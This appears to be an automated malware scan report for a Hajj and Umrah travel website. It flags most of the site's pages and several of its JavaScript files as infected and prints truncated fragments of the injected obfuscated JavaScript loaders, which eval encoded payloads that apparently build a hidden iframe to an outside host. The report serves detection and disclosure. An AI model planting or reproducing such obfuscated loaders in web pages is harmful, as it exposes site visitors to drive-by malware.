Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=rasultt.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://rasultt.com/ | 200 OK Content-Length: 17501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/Scripts/swfobject_modified.js | 200 OK Content-Length: 29067 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0172,0170,0164,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://rasultt.com/hajj.php | 200 OK Content-Length: 13991 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/hajj-pakages.php?hajj_star_id=12 | 200 OK Content-Length: 14920 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/hajj-details.php?hajj_stars_id=12&pakage_id=10 | 200 OK Content-Length: 22755 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/thickbox/jquery-latest.js | 200 OK Content-Length: 190556 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0172,0170,0164,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://rasultt.com/thickbox/thickbox.js | 200 OK Content-Length: 12705 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0172,0170,0164,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://rasultt.com/hajj_bookpage.php?cat=12&catpack=10&keepThis=true&TB_iframe=true&height=520&width=700 | 200 OK Content-Length: 14908 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["bod"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_79_7d_75_77_74_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_79_7d_75_77_74_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_79_7d_75_77_74_35_7a_7b_80_73_6c_35 Antivirus reports:
| ||
http://rasultt.com/js/scw.js | 200 OK Content-Length: 94886 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{document;}catch(q){asd=1;}}if(!asd)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0172,0170,0164,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155 Antivirus reports:
| ||
http://rasultt.com/test404page.js | 404 Not Found Content-Length: 11812 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://rasultt.com/cgi-sys/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
http://rasultt.com/index.php | 200 OK Content-Length: 17501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/umrah.php | 200 OK Content-Length: 12067 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
| ||
http://rasultt.com/star-pakages.php?star_id=84 | 200 OK Content-Length: 25510 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_71_6e_75_73_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_71_6e_75_73_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_68_77_70_74_6c_6b_70_68_35_6a_81_36_78_4a_6d_72_55_57_5e_3b_35_77_6f_77_2e_42_14_11_27_71_6e_75_73_35_7a_7b_80_73_6c_35_77_76 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: rasultt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 06:15:20 GMT
Server: nginx/1.6.2
Content-Type: text/html
GET / HTTP/1.1
Host: rasultt.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 28 Dec 2014 06:15:20 GMT
Server: nginx/1.6.2
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: rasultt.com
Referer: http://www.google.com/search?q=rasultt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: rasultt.com
Referer: http://www.google.com/search?q=rasultt.com
Result:
The result is similar to the first query. There are no suspicious redirects found.